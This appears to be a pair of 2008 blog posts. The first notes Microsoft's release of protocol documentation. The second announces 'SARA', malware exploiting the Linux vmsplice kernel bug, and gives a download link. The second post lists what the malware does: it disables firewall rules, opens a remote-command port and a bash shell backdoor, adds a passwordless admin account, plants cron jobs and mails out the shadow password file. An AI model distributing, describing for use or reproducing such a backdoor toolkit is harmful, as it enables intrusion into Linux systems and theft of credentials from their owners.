Monday, February 25, 2008

Microsoft started a Protocols Program

Microsoft has started a Protocols Program. This project includes thousands of pages of documentation (in .pdf format) divided into categories like Microsoft Communications Protocol Program (MCPP, for "server software that interoperates with Windows desktop operating systems") and Microsoft [Work Group] Server Protocol Program (WSPP, for "server software that interoperates with Microsoft Windows server and desktop operating systems to provide file, print, and user and group administration services"). I am frankly astounded by the number of documents available. Windows_Communication_Protocols.zip and Windows_Server_Protocols.zip are 314 MB total. Documentation like this is a boon for those who develop protocol analyzers, network security inspection systems, and filtering products. Security analysts and reverse engineers will also like to read this material.

Tuesday, February 19, 2008

SARA Linux Malware

Hi all!
I released today a basic malware for to exploit the vmsplice bug on Linux kernel.
This program use the vulnerability for install some backdoors on system.

UPDATED
Actions:
- disable INPUT rules on firewall
- open the 1407 port for execute remote commands
- open a bash session on 14071 port using the xinetd daemon
- add a admin user without password
- schedule malicious tasks on cron
- mail the shadow file for a mail account

Vulnerables systems: Linux 2.6.17 - 2.6.24.1

Warning:
THIS IS A MALWARE. DON'T RUN IT IF YOU DON'T KNOW
WHAT YOU ARE DOING.

Download:
http://coarseknocking.sourceforge.net/sara/sara-malware-0.0.2.tar.gz